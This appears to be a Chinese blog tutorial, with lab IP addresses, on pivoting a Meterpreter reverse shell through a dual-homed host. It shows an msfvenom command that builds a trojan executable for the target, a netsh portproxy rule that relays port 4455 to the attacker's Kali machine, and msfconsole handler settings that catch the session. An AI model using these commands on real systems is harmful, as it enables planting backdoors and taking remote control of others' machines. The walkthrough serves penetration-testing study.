当前位置: 首页 > news >正文

【隧道应用-2】netsh端口转发监听Meterpreter

一、场景

在这里插入图片描述

在服务器A上可以通过设置代理访问B服务器。如果要拿到B服务器的权限通常是生成正向的后门,然后 kali 的 msf上可以正向连接B服务器,由此得到Meterpreter,进而进行其他操作。如果服务器B上有防火墙拦截,kali 的 msf不能正向连接上后门。

为解决这问题,可以通过生成一个反向后门,上传到服务器B,连接到服务器A,在服务器A 上再通过端口转发给 到kali的msf上。

kali:192.168.0.149
主机A:192.168.0.152 / 10.10.10.130
主机B:10.10.10.128

二、操作

2.1、msf生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=(监听主机ip -> A) lport=4455 -f exe>r.exe

在这里插入图片描述

生成一个r.exe 木🐴,上传到主机B上。

2.2、在A服务器上增加命令

将A的端口4455转发到kali上的4455端口上。

netsh interface portproxy add v4tov4 listenport=4455 connectaddress=(要转发到的主机ip -> kali攻击机的ip) connectport=4455

在这里插入图片描述

2.3、在kali上设置监听

msfconsole

use windows/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 本地ip地址

set lport 4455

在这里插入图片描述

然后在主机B运行木🐴 r.exe,msf成功收到session。
在这里插入图片描述

三、总结

在这里插入图片描述其实很好理解,可能感觉上会有点乱而已。
kali是攻击的,因为网段的不同,所以无法直接和B进行通信。但是A有双网卡,所以可用来做跳板。

场景是说kali不能用msf直接正向连接B。那么可以在kali上生成一个反向的马,反向连接的监听地址是A,端口设置4455。那么在A用netsh设置端口转发,把所有连接到本机4455端口的流量数据都转发到kali攻击机ip的4455端口上。然后!在msf简单本机的4455端口,当B运行木🐴程序,msf就可以上线收到来自B的session了。

相关文章:

  • 贵德县wap网站建设公司/seo基础培训机构
  • 网站 方案/网络宣传方式
  • 网站建设评估/网络营销策略包括哪四种
  • 网站建设推广咨询平台/舆情监测软件
  • 汉中做网站的电话/百度推广开户联系方式
  • wordpress建cms/百度推广费用可以退吗
  • 从零开始搭建仿抖音短视频APP-后端开发评论业务模块(2)
  • 如何测量电源的噪声(有视频)
  • 基于CNTK实现迁移学习-图像分类【附部分源码】
  • redis-集群理论篇
  • 安装Hive集群
  • 大数据行业现在工作很难找吗?
  • KMP算法模式匹配——手工求解next和nextval数组值
  • 【蓝桥杯真题练习】STEMA科技素养练习题库 答案版011 持续更新中~
  • Maven:命令行
  • java计算机毕业设计燕理快递中转站系统设计与实现MyBatis+系统+LW文档+源码+调试部署
  • 杰理之注册编码服务事件回调【篇】
  • SpringBoot统一返回处理出现cannot be cast to java.lang.String异常